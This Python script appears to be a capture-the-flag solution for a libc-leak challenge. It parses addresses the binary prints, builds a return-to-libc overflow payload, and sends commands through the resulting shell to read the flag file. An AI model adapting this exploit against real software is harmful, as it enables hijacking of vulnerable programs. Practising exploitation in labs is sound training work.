#! /usr/bin/python3
"""Drive a local binary over pipes and feed it one crafted stdin line.

The script reads two addresses that the target program itself prints to
stdout (stored as ``puts_address`` and ``bin_sh_address``), derives a third
address from the first by subtracting a hard-coded constant, packs the
addresses into a single newline-terminated input line, writes it to the
program's stdin, then sends two shell commands and echoes what comes back.

Everything is line-oriented on the child's stdout/stderr pipes, so the
readline() sequence below is tied to the exact output order of this one
binary.  From a defender's point of view, the whole approach depends on the
program printing its own addresses: a program that does not expose them
gives this script nothing to parse.
"""
import subprocess

# Spawn the target with all three standard streams piped so its output can be
# parsed here and its input controlled from here.
process = subprocess.Popen(["/problems/got-2-learn-libc_0_4c2b153da9980f0b2d12a128ff19dc3f/vuln"],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = process.stdout
# Skip two banner lines; the third line carries the first printed address.
out.readline()
out.readline()
s = out.readline()
# Keep the 8 hex digits after the 'x' of a "0x..." token.  ``s`` is bytes, so
# bytes.find() is given an int code point.  Eight digits means a 32-bit value
# is assumed; a longer address would be truncated here.
puts_address = s[s.find(ord("x"))+1:s.find(ord("x"))+9]
puts_address = int(puts_address,base=16)
print(hex(puts_address))
# Fixed distance between the leaked address and the derived one.  This
# constant is specific to one libc build — TODO confirm it against the
# target's libc whenever the environment changes.
system_address = puts_address - 149504
print(str(hex(system_address)))
# Skip three more lines; the next one carries the second printed address.
out.readline()
out.readline()
out.readline()
s = out.readline()
bin_sh_address = s[s.find(ord("x"))+1:s.find(ord("x"))+9]
bin_sh_address = int(bin_sh_address,base=16)
print(hex(bin_sh_address))
#print(bytes(bin_sh_address))
#print(bytes("llll",encoding="ascii"))
#print(bytes(system_address))
# Assemble the input line: 40 copies of bin_sh_address (4 bytes each,
# little-endian), one copy of system_address, 10 more copies of
# bin_sh_address, then a newline so a line-oriented read on the other side
# terminates.  bytes(0) is simply the empty byte string.
# NOTE(review): the listing this was taken from had lost its indentation;
# each loop body is reconstructed as a single statement — confirm against
# the original source.
shellcode=bytes(0)
for i in range(40):
    shellcode +=bin_sh_address.to_bytes(4,byteorder = 'little')
shellcode += system_address.to_bytes(4,byteorder = 'little')
for i in range(10):
    shellcode += bin_sh_address.to_bytes(4,byteorder = 'little')
shellcode+=bytes("\n",encoding='ascii')
print(shellcode.hex())
out.readline()
# str() of a bytes object prints its repr (b'...'), not the decoded text.
print(str(out.readline()))
process.stdin.write(shellcode)
# Popen pipes are buffered; flush so the line actually reaches the child now.
process.stdin.flush()
print(str(out.readline()))
print(str(out.readline()))
# Two newline-terminated commands are sent on the same stdin, then flushed
# together.
process.stdin.write(bytes("cat /problems/got-2-learn-libc_0_4c2b153da9980f0b2d12a128ff19dc3f/flag.txt \n",encoding="ascii"))
#process.stdin.write(b'cat /problems/got-2-learn-libc_0_4c2b153da9980f0b2d12a128ff19dc3f/flag.txt\n')
#process.stdin.write(b'whoami\n')
process.stdin.write(bytes("whoami\n",encoding="ascii"))
process.stdin.flush()
# One line from stdout and one from stderr are echoed; anything further the
# child writes is left unread.
print(str(out.readline()))
print(str(process.stderr.readline()))
# stdin is never closed, so wait() relies on the child exiting on its own.
process.wait()
print(process.returncode)